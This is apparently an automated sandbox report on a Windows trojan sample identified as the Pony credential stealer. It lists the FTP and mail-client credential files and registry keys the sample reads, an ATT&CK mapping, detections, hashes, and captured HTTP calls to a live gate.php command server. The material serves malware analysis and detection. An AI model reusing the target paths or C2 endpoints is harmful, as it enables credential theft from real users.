          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\BlazeFtp\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\NetSarang\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\SharedSettings.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\AceBIT\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\AceBIT\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Windows\32BitFtp.ini
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\4\Quick.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\3D-FTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\NetSarang\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FTP Explorer\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FTPRush\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbarJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\Frigate3\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\CuteFTP\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\3\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo\Jump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: HKEY_LOCAL_MACHINE\Software\TurboFTPJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\FlashFXP\4\History.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Windows\wcx_ftp.iniJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.datJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword3_2_0040EBA3
          Source: C:\Users\user\Desktop\AxgZVzUv8m.exeCode function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword3_2_0040EBA3

Remote Access Functionality

Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.AxgZVzUv8m.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: AxgZVzUv8m.exe PID: 2744, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column, top to bottom; a number before a technique is the count badge the report shows for it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 1 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 11 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Valid Accounts; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 DLL Side-Loading; 1 Valid Accounts; 11 Access Token Manipulation; 111 Process Injection; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Install Root Certificate; 12 Software Packing; 1 DLL Side-Loading; 1 Valid Accounts; 1 Virtualization/Sandbox Evasion; 11 Access Token Manipulation; 111 Process Injection
Credential Access: 2 OS Credential Dumping; 2 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 1 Account Discovery; 3 File and Directory Discovery; 24 System Information Discovery; 1 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Source | Detection | Scanner | Label
AxgZVzUv8m.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
AxgZVzUv8m.exe | 100% | Avira | HEUR/AGEN.1311807
AxgZVzUv8m.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0 | 100% | Avira URL Cloud | malware
http://https://ftp://operawand.dat_Software | 0% | Avira URL Cloud | safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey | 0% | Avira URL Cloud | safe
http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 | 100% | Avira URL Cloud | malware
http://dillion0mill.favcc1.com/gate.php | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
77026.bodis.com | 199.59.243.226 | true | true | | unknown
dillion0mill.favcc1.com | 103.224.212.212 | true | true | | unknown
ww25.dillion0mill.favcc1.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 | true | Avira URL Cloud: malware | unknown
http://dillion0mill.favcc1.com/gate.php | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://https://ftp://operawand.dat_Software | AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://dillion0mill.favcc1.com/gate.phphttp://dillion0mill.favcc1.com/gate.phpYUIPWDFILE0YUIPKDFILE0 | AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
ftp://http://https://ftp.fireFTPsites.datSeaMonkey | AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ibsensoftware.com/ | AxgZVzUv8m.exe, AxgZVzUv8m.exe, 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
103.224.212.212 | dillion0mill.favcc1.com | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
199.59.243.226 | 77026.bodis.com | United States | 395082 | BODIS-NJUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1495035
Start date and time: 2024-08-19 16:42:23 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AxgZVzUv8m.exe
renamed because original name is a hash value
Original Sample Name: 0dc91d39870a081f44b8429dcfbc223f.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/1@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 141
• Number of non-executed functions: 39
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: AxgZVzUv8m.exe
Time | Type | Description
10:44:50 | API Interceptor | 142459x Sleep call for process: conhost.exe modified
Process: C:\Users\user\Desktop\AxgZVzUv8m.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 94
Entropy (8bit): 3.233204299824007
Encrypted: false
SSDEEP: 3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
MD5: 3880EEB1C736D853EB13B44898B718AB
SHA1: 4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
SHA-256: 936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
SHA-512: 3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
Malicious: false
Reputation: moderate, very likely benign file
Preview: ......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.595815524962291
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: AxgZVzUv8m.exe
File size: 509'952 bytes
MD5: 0dc91d39870a081f44b8429dcfbc223f
SHA1: 2033cf336c22ca200e212333a4ebecfc25eeb43f
SHA256: f1114e448e0d95855b4124a0cc4fc0b601e187db29ec697128bee4d776c6eccb
SHA512: 6cd2218a0bb9bc4b177173d03076a1af59a6d1f38dac7fc5f1d7a89c385b4205490706a8c44e34551ba237e585ffeb26f42b7dd6e902754d6a6a16f07000dddd
SSDEEP: 12288:C9Y0A+J8888888x8MnBOky33qKQRaVogh8juqjYFa4n+Fo6xg:gnPJ8888888x8MnBg33qKQRaVogh8jJE
TLSH: 8DB492D3F2D669A2C701E572313A99B1181E5EA4629E1FFD51ABF73B30B61C00C1BC5A
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S.................$...........C... ...`....@.. ....................... ............@................................
Icon Hash: 70f0ecccdce2b051
Entrypoint: 0x41432e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x53C40593 [Mon Jul 14 16:30:11 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                Instruction
                jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x142d4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x69ef0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x80000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                .text   0x2000           0x12334       0x12400   e238712755902fccfda664820be13a0e  False     0.7805944991438356  data       7.65846150249695     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc   0x16000          0x69ef0       0x6a000   a610ec2506c42e1d65e510b789e8fdc2  False     0.1345260908018868  data       5.003567849615549    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc  0x80000          0xc           0x200     46fd6928d5bcc242bf214ac8cb860a9e  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                Name           RVA      Size     Type                                                                                           ZLIB Complexity
                RT_ICON        0x16268  0x42028  Device independent bitmap graphic, 256 x 512 x 32, image size 270336, resolution 2835 x 2835 px/m  0.07400065094535017
                RT_ICON        0x58290  0x10828  Device independent bitmap graphic, 128 x 256 x 32, image size 67584                            0.1495770732284396
                RT_ICON        0x68ab8  0x94a8   Device independent bitmap graphic, 96 x 192 x 32, image size 38016                             0.27307126340130333
                RT_ICON        0x71f60  0x5488   Device independent bitmap graphic, 72 x 144 x 32, image size 21600                             0.29357670979667283
                RT_ICON        0x773e8  0x4228   Device independent bitmap graphic, 64 x 128 x 32, image size 16896                             0.2719059990552669
                RT_ICON        0x7b610  0x25a8   Device independent bitmap graphic, 48 x 96 x 32, image size 9600                               0.4067427385892116
                RT_ICON        0x7dbb8  0x10a8   Device independent bitmap graphic, 32 x 64 x 32, image size 4224                               0.45661350844277676
                RT_ICON        0x7ec60  0x988    Device independent bitmap graphic, 24 x 48 x 32, image size 2400                               0.580327868852459
                RT_ICON        0x7f5e8  0x468    Device independent bitmap graphic, 16 x 32 x 32, image size 1088                               0.6551418439716312
                RT_GROUP_ICON  0x7fa50  0x84     data                                                                                           0.7121212121212122
                RT_VERSION     0x7fad4  0x41c    data                                                                                           0.435361216730038
                (The Language and Country columns were empty for every resource.)
                DLL          Import
                mscoree.dll  _CorExeMain
                Timestamp                        Protocol  SID      Signature                                             Severity  Source Port  Dest Port  Source IP    Dest IP
                2024-08-19T16:43:43.578383+0200  TCP       2014562  ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98  1         49708        80         192.168.2.8  103.224.212.212
                2024-08-19T16:43:44.649406+0200  TCP       2014562  ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98  1         49710        80         192.168.2.8  199.59.243.226
                Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                Aug 19, 2024 16:43:42.814620972 CEST  49708        80         192.168.2.8      103.224.212.212
                Aug 19, 2024 16:43:42.819780111 CEST  80           49708      103.224.212.212  192.168.2.8
                Aug 19, 2024 16:43:42.819911957 CEST  49708        80         192.168.2.8      103.224.212.212
                Aug 19, 2024 16:43:42.819911957 CEST  49708        80         192.168.2.8      103.224.212.212
                Aug 19, 2024 16:43:42.824767113 CEST  80           49708      103.224.212.212  192.168.2.8
                Aug 19, 2024 16:43:43.575997114 CEST  80           49708      103.224.212.212  192.168.2.8
                Aug 19, 2024 16:43:43.578324080 CEST  80           49708      103.224.212.212  192.168.2.8
                Aug 19, 2024 16:43:43.578382969 CEST  49708        80         192.168.2.8      103.224.212.212
                Aug 19, 2024 16:43:43.615467072 CEST  49708        80         192.168.2.8      103.224.212.212
                Aug 19, 2024 16:43:43.620423079 CEST  80           49708      103.224.212.212  192.168.2.8
                Aug 19, 2024 16:43:44.137830973 CEST  49710        80         192.168.2.8      199.59.243.226
                Aug 19, 2024 16:43:44.142843008 CEST  80           49710      199.59.243.226   192.168.2.8
                Aug 19, 2024 16:43:44.142987967 CEST  49710        80         192.168.2.8      199.59.243.226
                Aug 19, 2024 16:43:44.143043041 CEST  49710        80         192.168.2.8      199.59.243.226
                Aug 19, 2024 16:43:44.149456978 CEST  80           49710      199.59.243.226   192.168.2.8
                Aug 19, 2024 16:43:44.649259090 CEST  80           49710      199.59.243.226   192.168.2.8
                Aug 19, 2024 16:43:44.649307966 CEST  80           49710      199.59.243.226   192.168.2.8
                Aug 19, 2024 16:43:44.649405956 CEST  49710        80         192.168.2.8      199.59.243.226
                Aug 19, 2024 16:43:44.649461031 CEST  80           49710      199.59.243.226   192.168.2.8
                Aug 19, 2024 16:43:44.649516106 CEST  49710        80         192.168.2.8      199.59.243.226
                Aug 19, 2024 16:43:44.722608089 CEST  49710        80         192.168.2.8      199.59.243.226
                Aug 19, 2024 16:43:44.727612019 CEST  80           49710      199.59.243.226   192.168.2.8
                Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                Aug 19, 2024 16:43:42.449014902 CEST  58319        53         192.168.2.8   1.1.1.1
                Aug 19, 2024 16:43:42.811762094 CEST  53           58319      1.1.1.1       192.168.2.8
                Aug 19, 2024 16:43:43.616946936 CEST  62144        53         192.168.2.8   1.1.1.1
                Aug 19, 2024 16:43:44.136951923 CEST  53           62144      1.1.1.1       192.168.2.8
                Aug 19, 2024 16:44:27.727262020 CEST  53           65034      162.159.36.2  192.168.2.8
                Aug 19, 2024 16:44:28.655699015 CEST  53           49866      1.1.1.1       192.168.2.8
                Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
                Aug 19, 2024 16:43:42.449014902 CEST  192.168.2.8  1.1.1.1  0xe1b7    Standard query (0)  dillion0mill.favcc1.com       A (IP address)  IN (0x0001)  false
                Aug 19, 2024 16:43:43.616946936 CEST  192.168.2.8  1.1.1.1  0xf4e1    Standard query (0)  ww25.dillion0mill.favcc1.com  A (IP address)  IN (0x0001)  false
                Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                          CName            Address          Type                    Class        DNS over HTTPS
                Aug 19, 2024 16:43:42.811762094 CEST  1.1.1.1    192.168.2.8  0xe1b7    No error (0)  dillion0mill.favcc1.com                        103.224.212.212  A (IP address)          IN (0x0001)  false
                Aug 19, 2024 16:43:44.136951923 CEST  1.1.1.1    192.168.2.8  0xf4e1    No error (0)  ww25.dillion0mill.favcc1.com  77026.bodis.com                   CNAME (Canonical name)  IN (0x0001)  false
                Aug 19, 2024 16:43:44.136951923 CEST  1.1.1.1    192.168.2.8  0xf4e1    No error (0)  77026.bodis.com                                199.59.243.226   A (IP address)          IN (0x0001)  false
                • dillion0mill.favcc1.com
                • ww25.dillion0mill.favcc1.com
                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                0           192.168.2.8  49708        103.224.212.212  80                2744  C:\Users\user\Desktop\AxgZVzUv8m.exe
                Timestamp                             Bytes transferred  Direction  Data
                Aug 19, 2024 16:43:42.819911957 CEST  183                OUT        GET /gate.php HTTP/1.0
                Host: dillion0mill.favcc1.com
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Aug 19, 2024 16:43:43.575997114 CEST  351                IN         HTTP/1.1 302 Found
                date: Mon, 19 Aug 2024 14:43:43 GMT
                server: Apache
                set-cookie: __tad=1724078623.3206747; expires=Thu, 17-Aug-2034 14:43:43 GMT; Max-Age=315360000
                location: http://ww25.dillion0mill.favcc1.com/gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940
                content-length: 2
                content-type: text/html; charset=UTF-8
                connection: close
                Data Raw: 0a 0a
                Data Ascii:


                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                1           192.168.2.8  49710        199.59.243.226  80                2744  C:\Users\user\Desktop\AxgZVzUv8m.exe
                Timestamp                             Bytes transferred  Direction  Data
                Aug 19, 2024 16:43:44.143043041 CEST  232                OUT        GET /gate.php?subid1=20240820-0043-4362-acc8-bed20fff9940 HTTP/1.0
                Host: ww25.dillion0mill.favcc1.com
                Accept: */*
                Accept-Encoding: identity, *;q=0
                Connection: close
                User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                Aug 19, 2024 16:43:44.649259090 CEST  1236               IN         HTTP/1.1 200 OK
                date: Mon, 19 Aug 2024 14:43:44 GMT
                content-type: text/html; charset=utf-8
                content-length: 1210
                x-request-id: 9ee1cf00-22d7-419c-ad0b-9dee7756ccb2
                cache-control: no-store, max-age=0
                accept-ch: sec-ch-prefers-color-scheme
                critical-ch: sec-ch-prefers-color-scheme
                vary: sec-ch-prefers-color-scheme
                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_C5+L5nUWmAu2SGi66U6B9shqlx92WoCwezm5sg3VK7SeiDeQs+RZoSbeC+Djmnf9RLrJjX6vMSCufCeRg4R/MA==
                set-cookie: parking_session=9ee1cf00-22d7-419c-ad0b-9dee7756ccb2; expires=Mon, 19 Aug 2024 14:58:44 GMT; path=/
                connection: close
                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 35 2b 4c 35 6e 55 57 6d 41 75 32 53 47 69 36 36 55 36 42 39 73 68 71 6c 78 39 32 57 6f 43 77 65 7a 6d 35 73 67 33 56 4b 37 53 65 69 44 65 51 73 2b 52 5a 6f 53 62 65 43 2b 44 6a 6d 6e 66 39 52 4c 72 4a 6a 58 36 76 4d 53 43 75 66 43 65 52 67 34 52 2f 4d 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 